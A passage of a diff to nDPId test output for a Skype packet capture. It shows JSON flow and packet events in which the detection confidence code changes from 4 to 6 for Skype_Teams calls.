+00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":816,"source":"skype.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969670418,"flow_last_seen":1431969670418,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969670418,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.32","src_port":13021,"dst_port":40009,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":824,"source":"skype.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969671427,"flow_last_seen":1431969671427,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969671427,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.141","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":824,"source":"skype.pcap","alias":"nDPId-test","flow_id":128,"flow_packet_id":1,"flow_last_seen":1431969671427,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1431969671427,"pkt":"0NQSxnP1PBXCt3IOCABFAAA7f50AAEAR4bnAqAEiQAQXjTLdnEQAJ4UFnDYCwyd8EHi1QBLXs1KZU1iJVh3lwESpNueb3tiaIg=="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":824,"source":"skype.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969671427,"flow_last_seen":1431969671427,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969671427,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.141","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":824,"source":"skype.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969671427,"flow_last_seen":1431969671427,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969671427,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.141","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":825,"source":"skype.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969671427,"flow_last_seen":1431969671427,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969671427,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.28","src_port":13021,"dst_port":40026,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":825,"source":"skype.pcap","alias":"nDPId-test","flow_id":129,"flow_packet_id":1,"flow_last_seen":1431969671427,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969671427,"pkt":"0NQSxnP1PBXCt3IOCABFAAA8ovIAAEAR9aDAqAEiQTffHDLdnFoAKLy9nDgCw\/trQW+yBgre1M\/iGb+xrR1ukS\/k6lR8WrcUGNw="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":825,"source":"skype.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969671427,"flow_last_seen":1431969671427,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969671427,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.28","src_port":13021,"dst_port":40026,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":825,"source":"skype.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969671427,"flow_last_seen":1431969671427,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969671427,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.28","src_port":13021,"dst_port":40026,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":826,"source":"skype.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969671427,"flow_last_seen":1431969671427,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969671427,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.161","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":826,"source":"skype.pcap","alias":"nDPId-test","flow_id":130,"flow_packet_id":1,"flow_last_seen":1431969671427,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969671427,"pkt":"0NQSxnP1PBXCt3IOCABFAABA3g4AAEARUfvAqAEinTfroTLdnEsALJxsnDoCIAhyfiAhHAGT2pPsDhuBxLXCl+D8eTQt2\/ZTx9MpLSju"} 
-00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":826,"source":"skype.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969671427,"flow_last_seen":1431969671427,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969671427,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.161","src_port":13021,"dst_port":40011,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":826,"source":"skype.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969671427,"flow_last_seen":1431969671427,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969671427,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.161","src_port":13021,"dst_port":40011,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":836,"source":"skype.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969672489,"flow_last_seen":1431969672489,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969672489,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.144","src_port":13021,"dst_port":40034,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":836,"source":"skype.pcap","alias":"nDPId-test","flow_id":131,"flow_packet_id":1,"flow_last_seen":1431969672489,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969672489,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0NOAAAEARZEfAqAEinTeCkDLdnGIAINainDwChxJXV87XhkbitLg+A\/cA051ANFNY"} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":836,"source":"skype.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969672489,"flow_last_seen":1431969672489,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969672489,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.144","src_port":13021,"dst_port":40034,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":836,"source":"skype.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969672489,"flow_last_seen":1431969672489,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969672489,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.144","src_port":13021,"dst_port":40034,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":837,"source":"skype.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969672489,"flow_last_seen":1431969672489,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969672489,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.19","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":837,"source":"skype.pcap","alias":"nDPId-test","flow_id":132,"flow_packet_id":1,"flow_last_seen":1431969672489,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1431969672489,"pkt":"0NQSxnP1PBXCt3IOCABFAAA2EcMAAEAR7TnAqAEib91KEzLdnEEAItfhnD4Cb3aeHJFamREFARmu+jDLOabt8VoC3Pk="} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":837,"source":"skype.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969672489,"flow_last_seen":1431969672489,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969672489,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.19","src_port":13021,"dst_port":40001,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":837,"source":"skype.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969672489,"flow_last_seen":1431969672489,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969672489,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.19","src_port":13021,"dst_port":40001,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":841,"source":"skype.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969673443,"flow_last_seen":1431969673443,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969673443,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":50053,"dst_port":40030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":841,"source":"skype.pcap","alias":"nDPId-test","flow_id":133,"flow_packet_id":1,"flow_last_seen":1431969673443,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969673443,"pkt":"0NQSxnP1PBXCt3IOCABFAABAbK1AAEAGNnfAqAEinTc4ksOFnF5LaK4QAAAAALAC\/\/8DvAAAAgQFtAEDAwUBAQgKPiMELQAAAAAEAgAA"} 
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":842,"source":"skype.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969673443,"flow_last_seen":1431969673443,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969673443,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.153","src_port":50054,"dst_port":40005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -463,13 +463,13 @@ 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":843,"source":"skype.pcap","alias":"nDPId-test","flow_id":135,"flow_packet_id":1,"flow_last_seen":1431969673443,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969673443,"pkt":"0NQSxnP1PBXCt3IOCABFAABA3dtAAEAG4QXAqAEib91KL8OHnF60mgT1AAAAALAC\/\/9fYAAAAgQFtAEDAwUBAQgKPiMELQAAAAAEAgAA"} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":844,"source":"skype.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969673443,"flow_last_seen":1431969673443,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969673443,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.173","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":844,"source":"skype.pcap","alias":"nDPId-test","flow_id":136,"flow_packet_id":1,"flow_last_seen":1431969673443,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969673443,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0XMQAAEARBHrAqAEiQAQXrTLdnFEAIKzLnEACNoZuauEq3ADhWmqb7oTzdlIdyJ9N"} 
-00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":844,"source":"skype.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969673443,"flow_last_seen":1431969673443,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969673443,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.173","src_port":13021,"dst_port":40017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":844,"source":"skype.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969673443,"flow_last_seen":1431969673443,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969673443,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.173","src_port":13021,"dst_port":40017,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":845,"source":"skype.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969673443,"flow_last_seen":1431969673443,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969673443,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.153","src_port":13021,"dst_port":40023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":845,"source":"skype.pcap","alias":"nDPId-test","flow_id":137,"flow_packet_id":1,"flow_last_seen":1431969673443,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1431969673443,"pkt":"0NQSxnP1PBXCt3IOCABFAAA7lioAAEARmezAqAEinTfrmTLdnFcAJ4lunEIC66wPUwGEAyW45bIdeHP6QiT0x60Zbz70ciSKMQ=="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":845,"source":"skype.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969673443,"flow_last_seen":1431969673443,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969673443,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.153","src_port":13021,"dst_port":40023,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":845,"source":"skype.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969673443,"flow_last_seen":1431969673443,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969673443,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.153","src_port":13021,"dst_port":40023,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":846,"source":"skype.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969673443,"flow_last_seen":1431969673443,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969673443,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.149","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":846,"source":"skype.pcap","alias":"nDPId-test","flow_id":138,"flow_packet_id":1,"flow_last_seen":1431969673443,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"thread_ts_msec":1431969673443,"pkt":"0NQSxnP1PBXCt3IOCABFAAA180cAAEARCDTAqAEib91NlTLdnF4AIdImnEQCEhW3FidGQ7GJtk\/GLqF7d8vgcOXTwQ=="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":846,"source":"skype.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969673443,"flow_last_seen":1431969673443,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969673443,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.149","src_port":13021,"dst_port":40030,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":846,"source":"skype.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969673443,"flow_last_seen":1431969673443,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969673443,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.149","src_port":13021,"dst_port":40030,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":847,"source":"skype.pcap","alias":"nDPId-test","flow_id":134,"flow_packet_id":2,"flow_last_seen":1431969673574,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969673574,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYiGdN4KZwKgBIpxFw4bvEzbne1pKoqASOJB0cwAAAgQFrAQCCApOtNyOPiMELQEDAwk="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":848,"source":"skype.pcap","alias":"nDPId-test","flow_id":134,"flow_packet_id":3,"flow_last_seen":1431969673574,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969673574,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0MLVAAEAGKHTAqAEinTeCmcOGnEV7Wkqi7xM26IAQECzLGgAAAQEICj4jBLBOtNyO"} 
00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":850,"source":"skype.pcap","alias":"nDPId-test","flow_id":133,"flow_packet_id":2,"flow_last_seen":1431969673591,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969673591,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADMGsCidNziSwKgBIpxew4VPS3COS2iuEaASOJBdoQAAAgQFrAQCCApNhXEjPiMELQEDAwk="} 
@@ -478,10 +478,10 @@ 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":861,"source":"skype.pcap","alias":"nDPId-test","flow_id":135,"flow_packet_id":3,"flow_last_seen":1431969673741,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969673741,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0gCZAAEAGPsfAqAEib91KL8OHnF60mgT2n9mC04AQECy+ygAAAQEICj4jBVZNhV7N"} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":872,"source":"skype.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969674456,"flow_last_seen":1431969674456,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969674456,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.146","src_port":13021,"dst_port":40026,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":872,"source":"skype.pcap","alias":"nDPId-test","flow_id":139,"flow_packet_id":1,"flow_last_seen":1431969674456,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1431969674456,"pkt":"0NQSxnP1PBXCt3IOCABFAABBxa4AAEAR02nAqAEinTeCkjLdnFoALfPInEYCTMX9D0zWqHZlar9rRJ4nLA7eV\/fFhp0UOFHwVjJRpWMfLA=="} 
-00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":872,"source":"skype.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969674456,"flow_last_seen":1431969674456,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969674456,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.146","src_port":13021,"dst_port":40026,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":872,"source":"skype.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969674456,"flow_last_seen":1431969674456,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969674456,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.146","src_port":13021,"dst_port":40026,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 